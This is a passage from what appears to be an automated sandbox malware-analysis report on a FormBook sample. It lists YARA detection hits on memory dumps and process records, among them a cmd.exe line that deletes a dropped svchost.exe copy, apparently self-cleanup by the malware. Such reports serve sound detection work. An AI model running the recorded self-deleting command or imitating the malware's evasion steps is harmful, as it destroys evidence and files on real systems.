00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Target ID:	5
Start time:	09:28:40
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	09:28:40
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true